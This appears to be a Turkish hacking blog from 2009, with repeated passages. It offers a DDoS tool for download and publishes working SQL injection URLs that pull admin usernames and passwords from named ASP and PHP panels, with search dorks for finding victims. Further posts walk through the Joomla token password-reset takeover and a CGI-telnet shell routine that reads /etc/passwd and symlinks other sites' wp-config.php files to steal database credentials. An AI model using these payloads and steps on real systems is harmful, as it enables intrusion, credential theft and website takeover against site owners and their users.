Bir çok kişi program ile ddos olmaz gibi şeyleri savunacaklar biliyorum bende yıllardır hack yaptığım için bu programı garantiliyorum videoda göreceğiniz gibi bence memnun kalacaksınız.rar içindekilerDark fantasy ip = site.com yazarsanız ip adresini verirAyriyetten cmd üzerinden ping site.com yaparsanızda ip' alabilirsiniz.sprut.exe = ip adresini yazdığınız serveri pingler
Link 1 http://rapidshare.com/files/323588054/dDOS.rar
Link 2 Alternatif http://uploaded.to/file/irweho
29 Aralık 2009 Salı
Hata Verdirterek ftp ID bulmak Video
## Selamlar arkadaslar bu video sizin için yararlı oldugunu düşünüyorum bir göz gezdirmenizde fayda var hata verdirterek tanınmış scriptlerde ftp adlarını bulup configi rahatla çekebilirsiniz karışık ftp adları için birebir yöntem diğer scriptleri indirip sizde bulabilirsiniz ##
1 Link : http://rapidshare.com/files/32297333...deo_p4tr0n.rar
2 Link : http://uploaded.to/file/c6la88
# Selametle By p4tr0n
1 Link : http://rapidshare.com/files/32297333...deo_p4tr0n.rar
2 Link : http://uploaded.to/file/c6la88
# Selametle By p4tr0n
20 Ağustos 2009 Perşembe
Ohesa Duyuru PaneLi SqL Injection
#-# Title : Ohese Duyuru PaneLi SqL Injection #-# Script Download : http://www.aspindir.com/goster/5223
#-# exploit: /izle.asp?id=-999 union select 0,kullanici,sifre,3 from yonetim
http://www.site.com/path/izle.asp?id=-999 union select 0,kullanici,sifre,3 from yonetim user and passw0rd ! admin paneL : admin/giris.asp
Türk SiteLerini Uyarın, iyi ŞansLar
#-# exploit: /izle.asp?id=-999 union select 0,kullanici,sifre,3 from yonetim
http://www.site.com/path/izle.asp?id=-999 union select 0,kullanici,sifre,3 from yonetim user and passw0rd ! admin paneL : admin/giris.asp
Türk SiteLerini Uyarın, iyi ŞansLar
X-ice News System Remote SqL Injection
Basit bir açık, herkez kullanabilir; fakat Türk webmaster’ların bu açığı kapatması için uyarı notlarınızı bırakmanızı öneririm, çok eski açık ama google’da yüzlerce site var..
X-ice haber, duyuru paneLi açığı
Arama k0du: inurl:devami.asp
Vuln.
Username : /devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+adminPassword : /devami.asp?id=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin
Login : /admin/kontrol.asp
Kaynak:
# milw0rm.org
http://www.milw0rm.com/exploits/3469
X-ice haber, duyuru paneLi açığı
Arama k0du: inurl:devami.asp
Vuln.
Username : /devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+adminPassword : /devami.asp?id=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin
Login : /admin/kontrol.asp
Kaynak:
# milw0rm.org
http://www.milw0rm.com/exploits/3469
2 Ağustos 2009 Pazar
CGI-TELNET
Hedef siteler için kullandığımız bu yöntem gerçekten çok güzel ve iyi sonuçlar veriyor.İlk önce hedef sitenin hostinginden bir ftp veya bir sitesine shell sokarak cgi.pl imizi upload ettikten sonra iş gayet kolay .
cgi.pl chmod 755 yaptıktan sonra .
ls -la
daha sonra cat /etc/passwd bölümünü çekiyoruz metin belgesine copy paste yapıoruz kaydediyoruz
hedef siteler içinn
cd /var/named yapıyoruz siteleri görüyoruz
örnepin hedef siteniz wordpress ise
ln -s /home/siteid/public_html/wp-config.php a.txt ( a .txt niye derseniz configi oraya kaydedecek sizde bir c99 wasıtası ile sql ile baglanıp şifre çekiceksiniz.)
iyi çalışmalar.
cgi.pl chmod 755 yaptıktan sonra .
ls -la
daha sonra cat /etc/passwd bölümünü çekiyoruz metin belgesine copy paste yapıoruz kaydediyoruz
hedef siteler içinn
cd /var/named yapıyoruz siteleri görüyoruz
örnepin hedef siteniz wordpress ise
ln -s /home/siteid/public_html/wp-config.php a.txt ( a .txt niye derseniz configi oraya kaydedecek sizde bir c99 wasıtası ile sql ile baglanıp şifre çekiceksiniz.)
iyi çalışmalar.
Token açığı eski olmasına rağmen hala çok sayıda var.
şimdiki yazımda joomla sitelerinde ciddi bir risk oluşturan token exploitin den bahsedeceğim.
saldırgan(hacker) googlede hedefine ulaşmak için bir site arar ve bu siteyi bulmak için /index.php?option=com_user .dk gibi bir kod kullanır. burada saldırgan danimarka sitelerinde saldırı düzenlemek üzeredir.
saldırgan kendine bir site seçtikden sonra sitenin adından soraki kodları silerek aşağıda ki gibi exploiti kullanır
site.com/index.php?option=com_user&view=reset bunu silib sitenin sonuna /index.php?option=com_user&view=reset&layout=confirm kodunu ekle. ve token açığı kendini gösterir.
açılan ekranı Tırnak işareti ( ' ) ile uyararak şifre sıfırlama ekranını açmaktadır
daha sonra kullancı adı admin şifre de kendi belirlediği şifre ile sisteme girip operasyonunu gerçekleştirebilir.
saldırgan(hacker) googlede hedefine ulaşmak için bir site arar ve bu siteyi bulmak için /index.php?option=com_user .dk gibi bir kod kullanır. burada saldırgan danimarka sitelerinde saldırı düzenlemek üzeredir.
saldırgan kendine bir site seçtikden sonra sitenin adından soraki kodları silerek aşağıda ki gibi exploiti kullanır
site.com/index.php?option=com_user&view=reset bunu silib sitenin sonuna /index.php?option=com_user&view=reset&layout=confirm kodunu ekle. ve token açığı kendini gösterir.
açılan ekranı Tırnak işareti ( ' ) ile uyararak şifre sıfırlama ekranını açmaktadır
daha sonra kullancı adı admin şifre de kendi belirlediği şifre ile sisteme girip operasyonunu gerçekleştirebilir.
Magician Blog Açığı [milw0rm]
[»] Script: [ Magician v1.0 ] [»] Language: [ PHP ] [»] home: [ www.4smart.net ] [»] Founder: [ Evil-Cod3r ] [»] Gr44tz to: [ Recru1t Qabandi - Sniper Code - Mr.SaFa7 - The g0bL!N - S4S-T3rr0ist ] [»] Dork: [ "Powered By 4smart" ] [»] Price: [ $300 But i Scanned The Nulled !! ]###########################################################################===[ Exploit SQL ]=== [»] http://www.Site.com/path/book.php?do=show&ids=-1 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13--
Kaydol:
Yorumlar (Atom)